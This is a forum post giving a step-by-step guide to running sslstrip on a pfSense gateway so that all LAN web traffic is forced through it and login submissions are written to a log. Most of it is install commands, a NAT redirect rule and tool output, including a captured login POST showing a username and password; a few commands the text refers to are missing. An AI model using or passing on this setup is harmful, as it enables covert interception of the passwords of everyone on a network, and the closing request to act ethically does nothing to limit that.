Running SSLSTRIP on a pfSense box
Hi all, this is my first post here.
I consider myself to be a total noob when it comes to pfSense or freebsd. However, I was looking into mitm type attacks for fun and wondered if it would be possible to run sslstrip on the gateway itself as to automatically process all traffic without the need for arp poisoning. I searched the web but couldn't find any info on how to do this, but I got it working on my own and thought I would share my experience here.
I don't know exactly where to put this so I chose the general forum. Mods feel free to move it to a more appropriate location.
First, we need to add a couple of packages to the box so SSLstrip can actually run:
pkg_add -r ftp://ftp-archive.freebsd.org/pub/FreeBSD-Archive/ports/i386/packages-8.1-release/python/py26-twistedWeb-9.0.0.tbz
This installs the Python Twisted Web python-module which is needed for sslstrip functionality. As a bonus, python itself gets installed automatically as a dependency.
pkg_add -r ftp://ftp-archive.freebsd.org/pub/FreeBSD-Archive/ports/i386/packages-8.1-release/python/py26-openssl-0.10.tbz
The openssl python-module is also needed for sslstrip, I couldn't start sslstrip without it.
pkg_add -r ftp://ftp-archive.freebsd.org/pub/FreeBSD-Archive/ports/i386/packages-8.1-release/ftp/wget-1.12_1.tbz
Installing wget ensures an easy method of getting the sslstrip tar file on your box.
Dont know what this is for, but I read online that you need to do this after installing packages.
Let's run everything from the root home dir…
Download the sslstrip files
tar zxvf sslstrip-0.9.tar.gz
Extract the files to the ~/sslstrip-0.9 directory.
Change to the extracted directory
python setup.py install
Install the sslstrip files to the system
So now you can try if it works:
You should get something like this:
[2.0.2-RC3][firstname.lastname@example.org]/root(2): /usr/local/bin/sslstrip -h sslstrip 0.9 by Moxie Marlinspike Usage: sslstrip <options> Options: -w <filename>, --write= <filename>Specify file to log to (optional). -p , --post Log only SSL POSTs. (default) -s , --ssl Log all SSL traffic to and from server. -a , --all Log all SSL and HTTP traffic to and from server. -l <port>, --listen=<port> Port to listen on (default 10000). -f , --favicon Substitute a lock favicon on secure requests. -k , --killsessions Kill sessions in progress. -h Print this help message. [2.0.2-RC3][email@example.com]/root(3):</port></port></filename></filename></options>
Now, we need to create a nat rule to forward all tcp port 80 traffic to the port on which sslstrip listens. This is port 10000 by default.
Go to firewall/NAT and create a new rule. Source address=LAN Net, proto=tcp, dest ports=80, nat ip=<ip address="" of="" your="" box="">, nat ports=10000. A firewall rule should be created automatically for you to put port 10000 open.
Now in a ssh shell, run
This ensures sslstrip remains active even if you close the ssh session.
Now a logfile is created in root's home dir called sslstrip.log which should contain passwords.
Output of the file looks like so:
[2.0.2-RC3][firstname.lastname@example.org]/root(9): cat sslstrip.log 2012-07-03 21:49:49,290 POST Data (www.facebook.com): lsd=AVpQRVOK&return_session=0&legacy_return=1&display=&session_key_only=0&trynum=2&charset_test=%E2%82%AC%2C%C2%B4%2C%E2%82%AC%2C%C2%B4%2C%E6%B0%B4%2C%D0%94%2C%D0%84&timezone=-120&lgnrnd=124859_hr3C&lgnjs=n&email=testing&pass=testing123&default_persistent=0&login=Log+In [2.0.2-RC3][email@example.com]/root(10):
You can see I entered testing as a username and testing123 as a password.
That's all now. Please use this in an ethically responsible way.</ip>